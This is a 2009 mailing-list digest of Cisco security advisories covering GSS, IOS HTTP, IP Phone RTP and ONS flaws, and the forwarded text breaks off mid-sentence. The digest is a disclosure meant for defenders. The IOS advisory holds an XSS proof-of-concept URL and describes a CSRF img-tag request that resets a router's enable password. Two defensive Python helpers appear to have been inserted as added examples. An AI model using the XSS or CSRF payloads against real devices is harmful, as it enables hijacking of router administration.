[guru] Cisco security updates
DATE: Tue, 03 Mar 2009 23:55:55 +0100
The DNS service of the Cisco Application Control Engine Global Site
Selector (GSS) can be crashed with a suitably crafted DNS request.
XSS vulnerabilities were found in the HTTP server built into Cisco IOS.
The Cisco Unified IP Phone 7960G and 7940G (with the SIP protocol) do not
process RTP headers correctly; the phones can be DoS-ed through this.
The Cisco ONS 15300 Edge Optical Transport Platform, Cisco ONS 15454
Optical Transport Platform, Cisco ONS 15454 SDH Multiservice Platform
and Cisco ONS 15600 Multiservice Switching Platform devices can be
DoS-ed with a suitably crafted TCP packet.
IronPort PXE Encryption contains an information disclosure flaw: an
attacker can gain access to encrypted e-mails. The administration
interface contains CSRF (cross-site request forgery) flaws: an attacker
can modify other users' settings.
Using Cisco Security Manager together with Cisco IPS Event Viewer (IEV)
contains a security flaw: while IEV is running, TCP ports are opened
that give root access to the Cisco Security Manager database and to the
server.
Cisco Unified Communications Manager (formerly Cisco CallManager)
contains a DoS vulnerability in its Certificate Authority Proxy Function
(CAPF) functionality.
Several security vulnerabilities (various DoS possibilities, and a
privilege escalation in which a user with Lobby Admin rights can obtain
full administrator rights) were found in Cisco Wireless LAN Controllers
(WLCs), Cisco Catalyst 6500 Wireless Services Modules (WiSMs) and Cisco
Catalyst 3750 Integrated Wireless LAN Controller devices.
The authentication system of the Cisco Unified MeetingPlace Web
Conferencing server is flawed: an attacker can bypass the authentication
phase with a suitably crafted URL.
The Cisco ACE Application Control Engine Module, Cisco ACE 4710
Application Control Engine Cisco ACE Module and Cisco ACE 4710
Application Control Engine products contain several security
vulnerabilities (admin-level access via a default username and password,
faulty authorization checks on the command-line interface, and DoS via
suitably crafted SSH and SNMP requests).
Several security vulnerabilities were found in the Cisco Application
Networking Manager (ANM) and Cisco Application Control Engine (ACE)
Device Manager applications (directory traversal flaws, the existence of
a default user, the existence of a default MySQL user, access to the
configuration files through a Java applet, and the ability to shut the
system down).
An XSS vulnerability was found in the Cisco Unified MeetingPlace Web
Conferencing software.
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Cisco Global Site Selector Appliances DNS
Vulnerability
Advisory ID: cisco-sa-20090107-gss
http://www.cisco.com/warp/public/707/cisco-sa-20090107-gss.shtml
Revision 1.0
For Public Release 2009 January 07 1600 UTC (GMT)
- ---------------------------------------------------------------------
Summary
=======
The Cisco Application Control Engine Global Site Selector (GSS)
contains a vulnerability when processing specific Domain Name System
(DNS) requests that may lead to a crash of the DNS service on the
GSS.
Cisco has released free software updates that address this
vulnerability.
A workaround that mitigates this vulnerability is available.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20090107-gss.shtml
Affected Products
=================
All versions of GSS system software prior to 3.0(1) are affected by
this vulnerability. If the GSS is configured with the optional Cisco
Network Registrar (CNR) software, the device is not vulnerable.
Vulnerable Products
+------------------
The following GSS products are affected by this vulnerability:
* Cisco GSS 4480 Global Site Selector
* Cisco GSS 4490 Global Site Selector
* Cisco GSS 4491 Global Site Selector
* Cisco GSS 4492R Global Site Selector
In order to determine the software that runs on a GSS device, users
should log in to the device and issue the show version command to
display the system software banner. The version is indicated on the
line starting with Version. The following example shows a GSS that
runs system software 2.0(1):
gss.cisco.com#show version
Global Site Selector (GSS)
Model Number: GSS-4491-k9
Copyright (c) 1999-2007 by Cisco Systems, Inc.
Version 2.0(1)
Uptime: 19 Hours 18 Minutes and 14 seconds
gss.cisco.com#
In order to determine if CNR is enabled on the GSS device, users
should log in to the device and issue the show running-config | grep
cnr command to display the system CNR configuration. If CNR is
enabled, cnr enable will be displayed in the output. If CNR is
disabled, no cnr enable will be displayed. The following example
shows a GSS that does not have CNR enabled:
GSS.cisco.com#show running-config | grep cnr
no cnr enable
GSS.cisco.com#
Products Confirmed Not Vulnerable
+--------------------------------
The following products have been confirmed not vulnerable:
* Cisco Global Site Selector using interaction with Cisco Network
Registrar
* Cisco Application Control Engine Module
* Cisco Network Registrar
* Cisco Content Services Switch (CSS)
No other Cisco products are currently known to be affected by this
vulnerability.
Details
=======
The Cisco GSS platform allows customers to leverage global content
deployment across multiple distributed and mirrored data locations,
optimizing site selection, improving Domain Name System (DNS)
responsiveness, and ensuring data center availability.
The GSS is inserted into the traditional DNS hierarchy and is closely
integrated with the Cisco CSS, Cisco Content Switching Module (CSM),
or third-party server load balancers (SLBs) to monitor the health and
load of the SLBs in customers data centers. The GSS uses this
information and user-specified routing algorithms to select the
best-suited and least-loaded data center in real time.
A vulnerability exists in the GSS when processing a specific sequence
of DNS requests. An exploit of the vulnerability may result in a
crash of the DNS service on the GSS.
When the DNS server crashes, an error message will appear in the logs
similar to the following example:
Dec 18 04:47:21 gss NMR-6-LAUNCHSVR_EXIT[27261] dnsserver' has exited [ExitUnknown(139)]"
This vulnerability is documented in Cisco Bug ID: CSCsj70093
This vulnerability has been assigned the Common Vulnerabilities and
Exposures (CVE) identifier CVE-2008-3819.
Vulnerability Scoring Details
==============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CSCsj70093: GSS DNS service may crash when processing specific DNS
requests.
CVSS Base Score - 7.8
Access Vector : Network
Access Complexity : Low
Authentication : None
Confidentiality Impact: None
Integrity Impact : None
Availability Impact : Complete
CVSS Temporal Score - 6.4
Exploitability : Functional
Remediation Level : Official-Fix
Report Confidence : Confirmed
Impact
======
Successful exploitation of the vulnerability may result in a crash of
the GSS DNS service. Repeated exploitation may result in a sustained
denial of service (DoS) attack.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
+---------------------------------------+
| GSS | First Fixed | Recommended |
| Major | Release | Release |
| Version | | |
|---------+---------------+-------------|
| | Vulnerable; | |
| 1.x(y) | Migrate to | 3.0(2) |
| | 3.0(1) or | |
| | later | |
|---------+---------------+-------------|
| | Vulnerable; | |
| 2.x(y) | Migrate to | 3.0(2) |
| | 3.0(1) or | |
| | later | |
|---------+---------------+-------------|
| 3.x(y) | Not | |
| | Vulnerable | |
+---------------------------------------+
GSS fixed system software is available for download from
http://www.cisco.com/cgi-bin/tablebuild.pl/gss-3des?psrtdcat20e2
Workarounds
===========
A workaround for this vulnerability includes setting the property
"ServerConfig.dnsserver.returnError" to disabled (or zero). The
following example shows how to set the property to disabled. It is
enabled by default:
GSS#config terminal
GSS(config)#$sserver.returnError 0
GSS(config)#property set ServerConfig.dnsserver.returnError 0
GSS(config)#exit
GSS#write memory
Note: Negative responses (NXDOMAIN and NODATA) will not be sent out
by the GSS with this setting disabled. Also, by using the DNS server
statistics (show statistics dns global), it will not be possible to
differentiate between the NXDOMAIN or NODATA mismatches because both
of these will increment the DNSQueriesUnmatched counter.
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized
telephone numbers, and instructions and e-mail addresses for use
in various languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is aware of active exploitations where malicious use
of the vulnerability described in this advisory has occurred.
This vulnerability was discovered by investigating customer TAC
service requests.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20090107-gss.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2009-January-07 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
iEYEARECAAYFAklk0GkACgkQ86n/Gc8U/uC6pgCcCgB77Z4FQULx2eaebHFGykP5
9f4AoIpdxXVA12D+KcCAxNZphQk/ICNc
=YvIZ
-----END PGP SIGNATURE-----
--- End Message ---
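The three checks the GSS advisory walks through (the Version line of show version against 3.0(1), the cnr enable line of the running configuration, and the NMR-6-LAUNCHSVR_EXIT message that marks a dnsserver crash) as an added Python triage helper. This is example code written for this page, not Cisco's; the sample CLI output and the crash log line are copied from the advisory's own examples, and the function names and the unrelated filler log line are assumptions.

```python
"""Added example for cisco-sa-20090107-gss (not Cisco's code).

Three checks the advisory describes, as functions over captured CLI output
or syslog text:
  * parse_gss_version / gss_is_vulnerable  - 'show version' banner vs. 3.0(1)
  * cnr_enabled                            - 'show running-config | grep cnr'
  * find_dnsserver_exits                   - the NMR-6-LAUNCHSVR_EXIT crash line
All sample text below is constructed from the advisory's own examples.
"""
import re

FIRST_FIXED = (3, 0, 1)  # advisory: all system software prior to 3.0(1) is affected

# 'Version 2.0(1)' -> (2, 0, 1)
VERSION_RE = re.compile(r"^\s*Version\s+(\d+)\.(\d+)\((\d+)\)", re.MULTILINE)

# "... NMR-6-LAUNCHSVR_EXIT[27261] dnsserver' has exited [ExitUnknown(139)]"
CRASH_RE = re.compile(
    r"NMR-6-LAUNCHSVR_EXIT\[\d+\].*dnsserver'?\s+has exited\s+\[(\w+)\((\d+)\)\]"
)


def parse_gss_version(show_version: str):
    """Return (major, minor, build) from the 'Version' line, or None if absent."""
    m = VERSION_RE.search(show_version)
    return tuple(int(x) for x in m.groups()) if m else None


def cnr_enabled(cnr_grep_output: str) -> bool:
    """True only if a line reads exactly 'cnr enable'; 'no cnr enable' means disabled."""
    return any(line.strip() == "cnr enable" for line in cnr_grep_output.splitlines())


def gss_is_vulnerable(show_version: str, cnr_grep_output: str) -> bool:
    """Advisory conditions: software prior to 3.0(1) AND CNR not enabled."""
    version = parse_gss_version(show_version)
    if version is None:
        raise ValueError("no 'Version x.y(z)' line found in show version output")
    return version < FIRST_FIXED and not cnr_enabled(cnr_grep_output)


def find_dnsserver_exits(log_text: str):
    """Return (line, exit_reason, exit_code) for each dnsserver exit message."""
    hits = []
    for line in log_text.splitlines():
        m = CRASH_RE.search(line)
        if m:
            hits.append((line, m.group(1), int(m.group(2))))
    return hits


# --- constructed sample input (mirrors the advisory's examples) ---------------
SAMPLE_SHOW_VERSION = """gss.cisco.com#show version
Global Site Selector (GSS)
Model Number: GSS-4491-k9
Copyright (c) 1999-2007 by Cisco Systems, Inc.
Version 2.0(1)
Uptime: 19 Hours 18 Minutes and 14 seconds
gss.cisco.com#
"""

SAMPLE_CNR_GREP = """GSS.cisco.com#show running-config | grep cnr
no cnr enable
GSS.cisco.com#
"""

# Two constructed syslog lines: one unrelated filler, one copying the advisory's crash line.
SAMPLE_LOG = (
    "Dec 18 04:47:10 gss CONSTRUCTED-6-NOISE[1] unrelated line for the example\n"
    "Dec 18 04:47:21 gss NMR-6-LAUNCHSVR_EXIT[27261] dnsserver' has exited [ExitUnknown(139)]\n"
)

if __name__ == "__main__":
    print("version:", parse_gss_version(SAMPLE_SHOW_VERSION))
    print("CNR enabled:", cnr_enabled(SAMPLE_CNR_GREP))
    print("vulnerable:", gss_is_vulnerable(SAMPLE_SHOW_VERSION, SAMPLE_CNR_GREP))
    for line, reason, code in find_dnsserver_exits(SAMPLE_LOG):
        print(f"dnsserver exit {reason}({code}): {line}")
```

The crash pattern is the signature worth alerting on: with the workaround (returnError set to 0) applied, the advisory notes NXDOMAIN and NODATA can no longer be told apart in show statistics dns global, so syslog becomes the only place where a repeated crash is visible.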
--- Begin Message ---
PR08-19: XSS on Cisco IOS HTTP Server
Date found: 1st August 2008
Vendor contacted: 1st August 2008
Advisory publicly released: 14th January 2009
Severity: Medium
Credits: Adrian Pastor of ProCheckUp Ltd (www.procheckup.com)
Description:
Cisco IOS HTTP server is vulnerable to XSS within invalid parameters
processed by the "/ping" server-side binary/script.
Consequences:
An attacker may be able to cause execution of malicious scripting code
in the browser of a user who clicks on a link to the HTTP server of a
Cisco device.
This type of attack can result in non-persistent defacement of the
target admin interface, or the redirection of confidential information
to unauthorised third parties. i.e.: by scraping the data returned by
the '/level/15/exec/-/show/run/CR' URL via the XMLHttpRequest object.
It might also be possible to perform administrative changes by
submitting forged commands (CSRF) within the payload of the XSS attack.
i.e.: injecting an 'img' tag which points to
'/level/15/configure/-/enable/secret/newpass' would change the enable
password to 'newpass'.
Notes:
1. The victim administrator needs to be currently authenticated for this
vulnerability to be exploitable
2. In order to exploit this vulnerability successfully, the attacker
only needs to know the IP address of the Cisco device. There is NO need
to have access to the IOS HTTP server
Proof of concept (PoC):
http://192.168.100.1/ping?<script>alert("Running+code+within+the_context+of+"%2bdocument.domain)</script>
Content of HTML body returned:
<BODY BGCOLOR=#FFFFFF><H2>test-router</H2><HR><DT>Error: URL syntax:
?<script>alert("Running code within the_context of
"+document.domain)</script></BODY>
Successfully tested on:
Cisco 1803
Cisco IOS Software, C180X Software (C180X-ADVIPSERVICESK9-M), Version
12.4(6)T7, RELEASE SOFTWARE (fc5)
Assigned Cisco Bug ID#:
CSCsr72301
CVE reference:
CVE-2008-3821
References:
http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr08-19
http://www.cisco.com/warp/public/707/cisco-sr-20090114-http.shtml
Fix:
Please see Cisco advisory for information on available updates.
Legal:
Copyright 2009 ProCheckUp Ltd. All rights reserved.
Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if the Bulletin is not changed or edited in any way, is attributed
to ProCheckUp indicating this web page URL, and provided such
reproduction and/or distribution is performed for non-commercial purposes.
Any other use of this information is prohibited. ProCheckUp is not
liable for any misuse of this information by any third party. ProCheckUp
is not responsible for the content of external Internet sites.
--- End Message ---
--- Begin Message ---
Title:
------
* Cisco Unified IP Phone 7960G and 7940G (SIP) RTP Header Vulnerability
Summary:
--------
* The Cisco Unified IP Phone 7960G and 7940G (SIP) do not correctly
parse some malformed RTP headers leading to a deterministic denial of
service
Assigned CVE:
-------------
* CVE-2008-4444
Details:
--------
* SIP protocol is used to set up calls between phones. Once the call is
established, the media content is carried by the RTP protocol. A remote
attacker could send a specially crafted RTP packet against a Cisco SIP
phone in such a way as to cause the phone to reboot.
Attack Impact:
--------------
* Denial-of-service (reboot or hang-up) and possibly remote arbitrary
code execution
Attack Vector:
--------------
* Have the possibility to set up a call to the targeted phone and carry
RTP frames to the vulnerable device
* Have access to the VoIP network while a call is established and inject
RTP frames
Timeline:
---------
* 2008-06-13 - Vulnerability reported to Cisco
* 2008-06-16 - Full details sent to Cisco
* 2008-10-21 - Cisco released a patched firmware
* 2009-01-14 - Release of this security advisory
Affected Products:
------------------
* Cisco Unified IP Phone 7960G and 7940G (SIP) with P0S3-08-9-00
firmware. Cisco released a patched firmware on October 21, 2008 which is
described in the bug identifier CSCsu22285 (Cisco Unified IP Phone 7960G
and 7940G (SIP) Release Notes for Firmware Release 8.10).
Credits:
--------
* This vulnerability was discovered by Gabriel Campana and Laurent Butti
from France Telecom / Orange
--- End Message ---
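The advisory above does not say which header fields the phones mishandle, so what follows is a generic RFC 3550 RTP header validator added as an example for this page, not the phone firmware and not code from the advisory's authors. It goes beyond the fixed 12-byte header to check the CSRC list, the extension header and the padding count against the actual packet length, which is the class of consistency check an RTP stack needs before it touches the payload; a monitoring probe can use the same function to flag malformed RTP on the VoIP segment. All sample packets are constructed.

```python
"""Added example: defensive RTP (RFC 3550) header parsing.

parse_rtp() raises MalformedRtp instead of trusting any length field it
has not checked against len(packet).  Not the phone firmware; a generic
validator written for this page.  All sample packets are constructed.
"""
import struct

RTP_VERSION = 2
FIXED_HEADER_LEN = 12  # V/P/X/CC, M/PT, seq(16), timestamp(32), SSRC(32)


class MalformedRtp(ValueError):
    """Raised when a length or flag in the header disagrees with the packet."""


def parse_rtp(packet: bytes) -> dict:
    if len(packet) < FIXED_HEADER_LEN:
        raise MalformedRtp(f"packet too short for fixed header: {len(packet)} bytes")
    b0, b1, seq, ts, ssrc = struct.unpack("!BBHII", packet[:FIXED_HEADER_LEN])
    version = b0 >> 6
    if version != RTP_VERSION:
        raise MalformedRtp(f"unexpected RTP version {version}")
    padding = bool(b0 & 0x20)
    extension = bool(b0 & 0x10)
    cc = b0 & 0x0F
    marker = bool(b1 & 0x80)
    payload_type = b1 & 0x7F

    # CSRC list: CC says how many 32-bit identifiers follow; check they exist.
    offset = FIXED_HEADER_LEN
    csrc_len = cc * 4
    if len(packet) < offset + csrc_len:
        raise MalformedRtp(f"CC={cc} needs {csrc_len} CSRC bytes, only {len(packet) - offset} present")
    csrcs = list(struct.unpack(f"!{cc}I", packet[offset:offset + csrc_len])) if cc else []
    offset += csrc_len

    # Header extension: 16-bit profile id + 16-bit length in 32-bit words.
    ext_profile, ext_data = None, b""
    if extension:
        if len(packet) < offset + 4:
            raise MalformedRtp("extension bit set but extension header truncated")
        ext_profile, ext_words = struct.unpack("!HH", packet[offset:offset + 4])
        offset += 4
        ext_len = ext_words * 4
        if len(packet) < offset + ext_len:
            raise MalformedRtp(f"extension claims {ext_len} bytes, only {len(packet) - offset} present")
        ext_data = packet[offset:offset + ext_len]
        offset += ext_len

    # Padding: last byte holds the padding count (including itself), never 0.
    payload = packet[offset:]
    if padding:
        if not payload:
            raise MalformedRtp("padding bit set but no bytes follow the header")
        pad = payload[-1]
        if pad == 0 or pad > len(payload):
            raise MalformedRtp(f"padding count {pad} invalid for {len(payload)} trailing bytes")
        payload = payload[:-pad]

    return {"version": version, "marker": marker, "payload_type": payload_type,
            "sequence": seq, "timestamp": ts, "ssrc": ssrc, "csrcs": csrcs,
            "extension_profile": ext_profile, "extension": ext_data, "payload": payload}


def is_well_formed(packet: bytes) -> bool:
    """Boolean wrapper for filters and monitors."""
    try:
        parse_rtp(packet)
        return True
    except MalformedRtp:
        return False


# --- constructed sample packets --------------------------------------------
# V=2, no P/X, CC=0, PT=0 (PCMU), seq=1, ts=160, SSRC=0x12345678, 4 payload bytes
GOOD = bytes([0x80, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xA0,
              0x12, 0x34, 0x56, 0x78]) + b"\x00\x01\x02\x03"
BAD_CC = bytes([0x8F]) + GOOD[1:12]                    # CC=15 but no CSRC bytes
BAD_EXT = bytes([0x90]) + GOOD[1:12] + b"\xBE\xDE\xFF\xFF"  # X=1, length 65535 words
BAD_PAD = bytes([0xA0]) + GOOD[1:12] + b"\x00\x00\x00\x09"  # P=1, count 9 > 4 bytes
BAD_VERSION = bytes([0x40]) + GOOD[1:]                  # version field = 1

if __name__ == "__main__":
    print(parse_rtp(GOOD))
    for name, pkt in [("BAD_CC", BAD_CC), ("BAD_EXT", BAD_EXT),
                      ("BAD_PAD", BAD_PAD), ("BAD_VERSION", BAD_VERSION)]:
        print(name, "well-formed:", is_well_formed(pkt))
```

Every length the parser reads (CC, the extension word count, the padding byte) is compared with the bytes actually received before any slicing, which is the property a decoder needs regardless of which field the affected firmware got wrong.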
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Cisco ONS Platform Crafted Packet
Vulnerability
Advisory ID: cisco-sa-20090114-ons
http://www.cisco.com/warp/public/707/cisco-sa-20090114-ons.shtml
Revision 1.0
For Public Release 2009 January 14 1600 UTC (GMT)
- ---------------------------------------------------------------------
Summary
=======
The Cisco ONS 15300 series Edge Optical Transport Platform, the Cisco
ONS 15454 Optical Transport Platform, the Cisco ONS 15454 SDH
Multiservice Platform, and the Cisco ONS 15600 Multiservice Switching
Platform contain a vulnerability when processing TCP traffic streams
that may result in a reload of the device control card.
Cisco has released free software updates that address this
vulnerability.
There are no workarounds that mitigate this vulnerability. Several
mitigations exist that can limit the exposure of this vulnerability.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20090114-ons.shtml
Affected Products
=================
Vulnerable Products
+------------------
The following Cisco ONS products are vulnerable if running affected
software versions:
* Cisco ONS 15310-CL and 15310-MA
* Cisco ONS 15327
* Cisco ONS 15454 and 15454 SDH
* Cisco ONS 15600
Consult the section "Software Versions and Fixes" within this
advisory for affected software versions. To determine your software
version, view the Help > About window on the CTC management
software.
Products Confirmed Not Vulnerable
+--------------------------------
The following Cisco ONS products are confirmed not vulnerable:
* Cisco ONS 15800 Series
* Cisco ONS 15500 Series Extended Service Platform
* Cisco ONS 15302
* Cisco ONS 15305
* Cisco ONS 15200 Series Metro DWDM Systems
* Cisco ONS 15190 Series IP Transport Concentrator
No other Cisco products are currently known to be affected by this
vulnerability.
Details
=======
The affected Cisco 15310-CL, 15310-MA, ONS 15327, ONS 15454, ONS
15454 SDH, and ONS 15600 hardware is managed through the CTX,
CTX2500, XTC, TCC/TCC+/TCC2/TCC2P, TCCi/TCC2/TCC2P, and TSC control
cards respectively. These control cards are usually connected to a
Data Communications Network (DCN). In this context the term DCN is
used to denote the network that transports management information
between a management station and the network entity (NE). This
definition of DCN is sometimes referred to as Management
Communication Network (MCN). The DCN is usually physically or
logically separated from the optical data network and isolated from
the Internet. This limits the exposure to the exploitation of this
vulnerability from the Internet.
A crafted stream of TCP traffic to the control cards on a node will
result in a reset of the corresponding control cards on this node. A
complete 3-way handshake is required on any open TCP port to be able
to exploit this vulnerability.
The timing for the data channels traversing the switch is provided by
the control cards.
When an active and a standby Cisco ONS 15310-MA, ONS 15310-CL, ONS
15327, ONS 15454 or ONS 15454 SDH control card reloads at the same
time, the synchronous data channels traversing the switch drop
traffic until the card comes back online. Asynchronous data channels
traversing the switch are not impacted. Manageability functions
provided by the network element using the CTX, CTX2500, XTC or TCC/
TCC+/TCC2/TCC2P control cards are not available until the control
card comes back online.
On the Cisco ONS 15600 hardware, whenever both the active and standby
control cards are rebooting at the same time, there is no impact to
the data channels traversing the switch because the TSC performs a
software reset which does not impact the timing being provided by the
TSC for the data channels.
Manageability functions provided by the network element through the
TSC control cards are not available until the control card comes back
online.
This vulnerability is documented in Cisco bug ID CSCsr41128
and has been assigned Common Vulnerabilities and Exposures (CVE)
identifier CVE-2008-3818.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CVSS Base Score - 7.8
Access Vector : Network
Access Complexity : Low
Authentication : None
Confidentiality Impact: None
Integrity Impact : None
Availability Impact : Complete
CVSS Temporal Score - 6.4
Exploitability : Functional
Remediation Level : Official-Fix
Report Confidence : Confirmed
Impact
======
Successful exploitation of this vulnerability will result in a reset
of the node's control card. Repeated attempts to exploit this
vulnerability could result in a sustained DoS condition, dropping the
synchronous data channels traversing the switch (Cisco ONS 15310-MA,
ONS 15310-CL, ONS 15327, ONS 15454, ONS 15454 SDH) and preventing
manageability functions provided by the network element control cards
(all ONS switches) until the control card comes back online.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
+-------------------------------------------------------------------------+
| Affected Major Release | First Fixed Release |
|---------------------------------+---------------------------------------|
| 7.0 | Note: Releases prior to 7.0.2 are not |
| | vulnerable. First fixed in 7.0.7 |
|---------------------------------+---------------------------------------|
| 7.2 | Note: Releases prior to 7.2.2 are not |
| | vulnerable. First fixed in 7.2.3 |
|---------------------------------+---------------------------------------|
| 8.0 | Vulnerable; migrate to 8.5.3 or |
| | later. |
|---------------------------------+---------------------------------------|
| 8.5 | Note: Releases prior to 8.5.1 are not |
| | vulnerable. First fixed in 8.5.3 |
|---------------------------------+---------------------------------------|
| 9.0 | Not vulnerable. |
+-------------------------------------------------------------------------+
Note: Releases prior to 7.0 are not affected by this vulnerability.
Workarounds
===========
There are no workarounds for this vulnerability. The following
general mitigation actions help prevent remote exploitation:
* Isolate DCN:
Ensuring the DCN is physically or logically separated from the
customer network and isolated from the Internet will limit the
exposure to the exploitation of these vulnerabilities from the
Internet or customer networks.
* Apply Transit Access Control Lists:
Apply access control lists (ACLs) on routers / switches /
firewalls installed in front of the vulnerable network devices
such that TCP/IP traffic destined for the CTX, CTX2500, XTC, TCC2
/TCC2+/TCC2P, or TSC control cards on the ONS is allowed only
from the network management workstations.
For examples on how to apply ACLs on Cisco routers, refer to the
white paper "Transit Access Control Lists: Filtering at Your
Edge", which is available at the following link:
http://www.cisco.com/en/US/customer/tech/tk648/tk361/technologies_white_paper09186a00801afc76.shtml
Additional mitigations that can be deployed on Cisco devices within
the network are available in the Cisco Applied Mitigation Bulletin
companion document for this advisory, which is available at the
following link:
http://www.cisco.com/warp/public/707/cisco-amb-20090114-ons.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
